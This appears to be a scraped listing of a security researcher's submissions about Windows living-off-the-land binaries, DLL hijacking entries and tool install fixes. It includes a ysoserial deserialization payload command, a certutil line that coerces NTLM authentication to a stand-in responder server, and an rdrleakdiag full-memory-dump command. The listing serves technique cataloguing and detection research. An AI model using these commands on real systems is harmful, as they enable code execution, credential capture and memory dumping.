Chris "Lopi" Spehn
Chris "Lopi" Spehn
https://twitter.com/falsneg/status/1418435653268697090
Payload generation command below. `ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` [Source](https://twitter.com/orange_8361/status/1518970259868626944)
pnputil.exe requires the driver to be signed, example output is below ``` C:\Windows\System32\pnputil.exe -i -a .\test.inf Microsoft PnP Utility Processing inf : test.inf Adding the driver package failed : The...
Note: Use the XML, not the bulleted list towards the top of the following page. https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Per @subtee on Twitter aka Casey Smith: https://twitter.com/subTee/status/1409919016504893452 `msinfo32 /nfo C:\path\lotsofinterestingthings.txt` Not an lolbas :) . May be should be classifed as recon? No? 
`rdrleakdiag.exe /p /o /fullmemdmp /wait 1` Source: https://twitter.com/0gtweet/status/1299071304805560321?s=21
As part of releasing WFH_Dridex edition inspired by the [Dridex loader](https://blog.lexfo.fr/dridex-malware.html), I am contributing 507 entries to HijackLibs. All of these entries typically require DLL proxying to work properly as...
`certutil.exe -syncwithWU \\ip_responderserver\CRL` NTLM auth coercion to remote server
Currently users must run the following command to install pydemangler, refactor requirements.txt to install it properly. `pip install git+https://github.com/wbenny/pydemangler.git`
See this issue: https://github.com/frida/frida/issues/2964 For WFH to function again, downgrade frida with pip. ``` pip install --force-reinstall -v "frida-tools==12.5.1" pip install --force-reinstall -v "frida==16.4.10" ```